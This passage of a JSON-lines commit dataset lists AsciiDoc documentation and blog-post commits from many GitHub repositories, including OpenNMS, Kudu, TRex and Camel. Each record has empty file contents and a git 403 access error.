content","repos":"roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/BSFMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/BSFMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"07680899e790c44ad0d41a5ceaa1cde7bd3497c4","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf19690edb4ea108a8596131f2f445cce579c4bc","subject":"y2b create post OnLive Game System Unboxing \\u0026 Overview","message":"y2b create post OnLive Game System Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-19-OnLive-Game-System-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-01-19-OnLive-Game-System-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f59b2e847f82714fabf9b60fc1a224cdc9fa213","subject":"fix mcast addr1","message":"fix mcast addr1\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_config.asciidoc","new_file":"trex_config.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6accfd9a2d46f922c53e4c39854d6c1f66648d82","subject":"Add deploy.py download instructions.","message":"Add deploy.py download instructions.\n\nAlso minor improvements to the Impala_Kudu doc section.\n\nTested:\nGenerated docs locally and inspected them in a browser.\n\nChange-Id: I901283025b1707852c0c36daa60a6221e8508166\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1045\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1cfdbfac0bff5dded3a17083e75f50e8730fb44c","subject":"Update 2017-05-21-First-hubpress.adoc","message":"Update 2017-05-21-First-hubpress.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-21-First-hubpress.adoc","new_file":"_posts\/2017-05-21-First-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdeb3061fd23285400243ba78d409c8720cb3988","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4577a8fb99c3e3df3d032735cfc4e21b951764fd","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03db3a71b0b5cf98b3c3478f48d49e113b1f6ebe","subject":"Update 2016-07-15-The-Beginning.adoc","message":"Update 2016-07-15-The-Beginning.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-07-15-The-Beginning.adoc","new_file":"_posts\/2016-07-15-The-Beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f911c1416ba5f6125da1531a49bd51ef6faf52d7","subject":"Update 2015-01-31-Things.adoc","message":"Update 2015-01-31-Things.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-Things.adoc","new_file":"_posts\/2015-01-31-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b276ee2488dd686712e827308edf2b14b11166cb","subject":"Add news item for release 2.0.0.RC2","message":"Add news item for release 2.0.0.RC2\n","repos":"levymoreira\/griffon,griffon\/griffon,griffon\/griffon,tschulte\/griffon,tschulte\/griffon,levymoreira\/griffon,levymoreira\/griffon,tschulte\/griffon","old_file":"docs\/griffon-site\/src\/jbake\/content\/news\/griffon_2.0.0.RC2.adoc","new_file":"docs\/griffon-site\/src\/jbake\/content\/news\/griffon_2.0.0.RC2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tschulte\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8593bf75fa7697f1d2a85bdfd3f442c11c86caf2","subject":"Update 2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","message":"Update 2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","new_file":"_posts\/2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4481c186eec51686070b62222a37e7dc4f11dffe","subject":"Update 2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","message":"Update 2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","new_file":"_posts\/2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3a0e910ab4f0648dbadf258e5c86309917ad3c6","subject":"add euroclojure","message":"add euroclojure\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/euroclojure.adoc","new_file":"content\/events\/2016\/euroclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"60ba8314ef972f67e2ad2cc36e4dd0289c2a0621","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd7b10aab0a511fd40ea2cade1f90898be0853d5","subject":"Add code of conduct","message":"Add code of conduct\n\nfixes gh-14\n","repos":"mp911de\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config,rhoegg\/spring-cloud-vault-config,rhoegg\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config,mp911de\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-vault-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"344375a1686cf8862bdf217447844049c1d2b5da","subject":"new blog","message":"new blog\n","repos":"hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/12\/hawkular-and-prometheus.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/12\/hawkular-and-prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a8f35f845a5b319a30d10ff0f5ac6dd5e2abaaa","subject":"First cut at version tracking table (AsciiDoc)","message":"First cut at version tracking table (AsciiDoc)","repos":"msgilligan\/mastercoin-vagrant","old_file":"versions.adoc","new_file":"versions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/mastercoin-vagrant.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eef20da6506efabd8874f554e45b2477f3c8096c","subject":"Fix table formatting in full data dirs docs","message":"Fix table formatting in full data dirs docs\n\nChange-Id: I098c64c3241e5fc4184b102e10ef619feb7de30a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10211\nTested-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3092eeba15c82d4fc856ac4b66f9e2ceaaed97d","subject":"VMXNET3 - Ubuntu not Fedora","message":"VMXNET3 - Ubuntu not Fedora\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6d0918fec6099457df304afe919305afd0b4468","subject":"create post This Slime Could Be Good For Your Phone...","message":"create post This Slime Could Be Good For Your Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-This-Slime-Could-Be-Good-For-Your-Phone....adoc","new_file":"_posts\/2018-02-26-This-Slime-Could-Be-Good-For-Your-Phone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a948e306a836ed8d8f91d491bfaf0c2509c44ec","subject":"Update 2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","message":"Update 2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","new_file":"_posts\/2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cf4b62377a56494e40bccbe55d52e99f5bd76df","subject":"Fix some installation docs which referred to internal git URL","message":"Fix some installation docs which referred to internal git URL\n\nChange-Id: If7ba73cf3b2e4dedd67a5d060121badc90d0205c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1066\nReviewed-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc7843a7e00979d8de64a7f7b1eb6e1c196ee248","subject":"Update 2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","message":"Update 2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","new_file":"_posts\/2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c378652ac06340b864004ee0c281b73ca2643db","subject":"Update 2016-03-06-Study-plan.adoc","message":"Update 2016-03-06-Study-plan.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2016-03-06-Study-plan.adoc","new_file":"_posts\/2016-03-06-Study-plan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bahamoth\/bahamoth.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e461e9347b967b6123cab9598b17eea6d785afc8","subject":"Update 2018-02-26-Firebae-Ui.adoc","message":"Update 2018-02-26-Firebae-Ui.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-Firebae-Ui.adoc","new_file":"_posts\/2018-02-26-Firebae-Ui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f02d520aa8fcf17b12e081dddc7a87021e0bd3","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95dc4ba0c9c4d4169ff61133e71332dd80e8cc5f","subject":"Update 2017-12-03-Trying-to-find-normal.adoc","message":"Update 2017-12-03-Trying-to-find-normal.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-12-03-Trying-to-find-normal.adoc","new_file":"_posts\/2017-12-03-Trying-to-find-normal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e93b1ecfc425fc377508bd679dda4bee169c767","subject":"Update 2016-07-14-blah-blah-blah.adoc","message":"Update 2016-07-14-blah-blah-blah.adoc","repos":"fuzzy-logic\/fuzzy-logic.github.io,fuzzy-logic\/fuzzy-logic.github.io,fuzzy-logic\/fuzzy-logic.github.io,fuzzy-logic\/fuzzy-logic.github.io","old_file":"_posts\/2016-07-14-blah-blah-blah.adoc","new_file":"_posts\/2016-07-14-blah-blah-blah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuzzy-logic\/fuzzy-logic.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a64dfcfaa9f58db1c50c74ae2352aba87b0fd5f","subject":"completed first draft of docs","message":"completed first draft of docs\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c870eb34b91a3834f9dccaacc44fc43344703f12","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a05393ba8f8f14907a9c35f6b5bc672305ccddc","subject":"Added topic load balancer EIP docs","message":"Added topic load balancer EIP docs\n","repos":"akhettar\/camel,gnodet\/camel,pax95\/camel,akhettar\/camel,kevinearls\/camel,anoordover\/camel,tdiesler\/camel,dmvolod\/camel,nikhilvibhav\/camel,snurmine\/camel,gnodet\/camel,kevinearls\/camel,jonmcewen\/camel,tdiesler\/camel,snurmine\/camel,anoordover\/camel,christophd\/camel,dmvolod\/camel,curso007\/camel,kevinearls\/camel,DariusX\/camel,jamesnetherton\/camel,onders86\/camel,adessaigne\/camel,curso007\/camel,jonmcewen\/camel,tadayosi\/camel,objectiser\/camel,tadayosi\/camel,snurmine\/camel,nicolaferraro\/camel,onders86\/camel,anoordover\/camel,snurmine\/camel,adessaigne\/camel,jamesnetherton\/camel,tadayosi\/camel,ullgren\/camel,jonmcewen\/camel,sverkera\/camel,cunningt\/camel,akhettar\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,punkhorn\/camel-upstream,tdiesler\/camel,CodeSmell\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,Fabryprog\/camel,DariusX\/camel,nikhilvibhav\/camel,Fabryprog\/camel,dmvolod\/camel,pmoerenhout\/camel,jamesnetherton\/camel,jamesnetherton\/camel,mcollovati\/camel,DariusX\/camel,apache\/camel,tdiesler\/camel,onders86\/camel,christophd\/camel,zregvart\/camel,onders86\/camel,apache\/camel,cunningt\/camel,alvinkwekel\/camel,mcollovati\/camel,DariusX\/camel,ullgren\/camel,ullgren\/camel,tdiesler\/camel,rmarting\/camel,pmoerenhout\/camel,apache\/camel,alvinkwekel\/camel,gautric\/camel,davidkarlsen\/camel,gautric\/camel,CodeSmell\/camel,rmarting\/camel,pax95\/camel,sverkera\/camel,zregvart\/camel,CodeSmell\/camel,rmarting\/camel,jonmcewen\/camel,Fabryprog\/camel,cunningt\/camel,christophd\/camel,pax95\/camel,tadayosi\/camel,adessaigne\/camel,jonmcewen\/camel,nicolaferraro\/camel,davidkarlsen\/camel,kevinearls\/camel,pmoerenhout\/camel,akhettar\/camel,ullgren\/camel,gnodet\/camel,akhettar\/camel,snurmine\/camel,christophd\/camel,gautric\/camel,rmarting\/camel,cunningt\/camel,kevinearls\/camel,pmoerenhout\/camel,gautric\/camel,objectiser\/camel,anoordover\/camel,mcollovati\/camel,Fabryprog\/camel,alvinkwekel\/camel,zregvart\/camel,pmoerenhout\/camel,objectiser\/camel,curso007\/camel,objectiser\/camel,punkhorn\/camel-upstream,rmarting\/camel,jonmcewen\/camel,apache\/camel,rmarting\/camel,jamesnetherton\/camel,sverkera\/camel,pax95\/camel,anoordover\/camel,gautric\/camel,pax95\/camel,cunningt\/camel,cunningt\/camel,sverkera\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,apache\/camel,kevinearls\/camel,nicolaferraro\/camel,onders86\/camel,dmvolod\/camel,nicolaferraro\/camel,sverkera\/camel,CodeSmell\/camel,curso007\/camel,snurmine\/camel,nikhilvibhav\/camel,akhettar\/camel,punkhorn\/camel-upstream,onders86\/camel,dmvolod\/camel,curso007\/camel,mcollovati\/camel,alvinkwekel\/camel,tdiesler\/camel,anoordover\/camel,davidkarlsen\/camel,christophd\/camel,zregvart\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,gnodet\/camel,davidkarlsen\/camel,tadayosi\/camel,christophd\/camel,jamesnetherton\/camel,curso007\/camel,gautric\/camel,dmvolod\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/topic-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/topic-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2a5029d93762a05069e991ae7c01f42906d6ad6","subject":"Init IBM","message":"Init IBM\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"IBM Cloud.adoc","new_file":"IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21245cb295edbdff97e74e0e48a5356db81a6d8f","subject":"Created documentation for the HttpMonitor monitor.","message":"Created documentation for the HttpMonitor 